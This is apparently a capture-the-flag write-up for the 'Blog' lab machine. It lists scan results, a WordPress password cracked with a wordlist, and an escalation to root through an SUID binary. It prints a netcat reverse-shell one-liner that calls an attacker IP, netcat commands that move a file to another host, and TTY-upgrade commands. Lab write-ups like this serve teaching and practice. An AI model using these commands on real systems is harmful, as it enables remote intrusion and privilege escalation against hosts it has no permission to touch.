Target Information

  • IP Address: 10.10.174.172
  • Domain: blog.thm
  • Operating System: Ubuntu 18.04.4 LTS (Bionic Beaver)
  • Kernel: Linux 4.15.0-101-generic

NMAP Scan Results

PORTSTATESERVICEVERSION
22/tcpopensshOpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcpopenhttpApache httpd 2.4.29 ((Ubuntu))
139/tcpopennetbios-ssnSamba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcpopennetbios-ssnSamba smbd 3.X - 4.X (workgroup: WORKGROUP)

Ports Priority


PORT 80

  • CMS: WordPress 5.0 (Confirmed)
  • Credentials:
    • [SUCCESS]: kwheel / cutiepie1 (Found By Rockyou.txt)

RCE (Remote Code Execution)

Reverse Shell (URL Encoded)

1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.69.221 4444 >/tmp/f

PORTS 139,445 (Rabbit Hole)

  • BillySMB

FULLY TTY

1python -c 'import pty; pty.spawn("/bin/bash")'
2stty raw -echo;fg;reset
3export TERM=linux

Privilege Escalation

Identify SUID Binary

1find / -perm /4000 -type f 2>/dev/null
Identified Binary: /usr/sbin/checker

Transfer Checker Binary

On Attacker Machine:
1nc -lvvp 7777 > checker
On Target Machine:
1nc 192.168.56.123 7777 < checker

Decompile Checker Binary

  • Analyze the binary using Ghidra.

Set Custom Variable

1export admin=1

Execute Checker Binary

1./checker
Note: Understand the binary's behavior before execution.

Pwned